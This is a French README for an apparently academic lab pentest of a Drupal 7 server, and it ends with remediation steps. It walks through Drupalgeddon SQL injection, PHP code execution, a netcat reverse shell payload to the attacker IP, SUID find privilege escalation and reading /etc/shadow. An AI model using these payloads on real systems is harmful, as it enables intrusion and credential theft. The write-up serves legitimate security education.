
Audit de sécurité Black Box d'un serveur Drupal 7. Démonstration d'une Kill Chain complète : Injection SQL (CVE-2014-3704) ➔ RCE ➔ Reverse Shell ➔ Escalade vers Root (SUID). Ce dépôt contient le rapport technique détaillé, les preuves d'exploitation (PoC) et les mesures de remédiation pour sécuriser l'infrastructure.
Ce projet a été réalisé dans un environnement de laboratoire contrôlé et isolé à des fins éducatives et académiques. Aucune infrastructure réelle n'a été ciblée. L'objectif est d'apprendre à sécuriser les systèmes en comprenant les mécanismes d'attaque.
L'objectif de ce projet est de réaliser un audit en boîte noire (Black Box). Cela signifie que l'analyse démarre sans aucune connaissance préalable de la cible : aucun identifiant, aucune documentation technique, ni code source n'a été fourni.
L'infrastructure a été déployée virtuellement sous VMware dans un réseau privé isolé (Host-Only) pour éviter toute interaction avec l'extérieur.
192.168.78.131
192.168.78.132
La première étape a consisté à cartographier la surface d'attaque de la machine cible à l'aide d'un scan de ports.
Commande exécutée : nmap -sV 192.168.78.132

Services identifiés :
L'analyse du service Web (Port 80) et du fichier robots.txt a révélé la présence d'un CMS Drupal. L'inspection du code source a permis d'identifier une version obsolète : Drupal 7.x.
Les résultats de la phase de reconnaissance ont mis en évidence une surface d'attaque critique : un CMS Drupal 7 non maintenu. Cette version est historiquement connue pour être vulnérable à des failles de sécurité majeures (notamment "Drupalgeddon").
Face à ce constat, l'audit s'est orienté vers une recherche ciblée de vulnérabilités publiques (CVE). Cette énumération a confirmé l'existence d'une chaîne d'exploitation complète, permettant de passer d'un simple visiteur web à un administrateur système "Root".
Vecteurs d'attaque identifiés :
Exploitation de la faille CVE-2014-3704 (Drupalgeddon). Cette vulnérabilité dans l'API de base de données de Drupal permet d'injecter des commandes SQL sans authentification.
users avec les droits Administrateur.
Une fois connecté en tant qu'administrateur, utilisation du module natif PHP Filter. Ce module, mal configuré, permet d'exécuter du code PHP arbitraire dans les pages du site.
<?php system('nc -e /bin/bash 192.168.78.131 4444'); ?>www-data).
Analyse des fichiers disposant de la permission SUID (Set User ID). Découverte d'une configuration critique sur la commande find.
find . -exec '/bin/sh' \;find s'exécute en root, lançant un shell avec les privilèges Root (uid=0).Une fois l'accès root obtenu, lecture du fichier sensible /etc/shadow pour exfiltrer les empreintes (hashs) des mots de passe utilisateurs.

L'audit a révélé un niveau de risque CRITIQUE. La combinaison d'un CMS obsolète et d'une négligence dans la configuration système (SUID) permet une compromission totale du serveur.
Impacts pour l'entreprise :
/etc/shadow).Plan d'action prioritaire :
chmod u-s /usr/bin/find).Pour le détail technique complet, les scripts utilisés et l'analyse approfondie, consultez le rapport complet : Lire le Rapport d'Audit (PDF)
Fabien MOINE